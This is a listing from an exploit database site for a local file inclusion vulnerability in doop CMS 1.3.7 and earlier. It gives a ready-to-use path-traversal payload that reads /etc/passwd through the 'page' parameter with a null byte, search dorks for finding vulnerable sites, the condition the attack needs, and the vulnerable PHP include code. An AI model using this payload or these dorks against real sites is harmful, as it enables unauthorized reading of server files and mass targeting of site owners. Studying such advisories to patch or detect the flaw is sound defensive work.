[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability

Author
vladii
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2227
Category
web applications
Date add
14-10-2007
Platform
unsorted
===========================================================
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
===========================================================



 ______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|



#  0day.today [2024-12-24]  #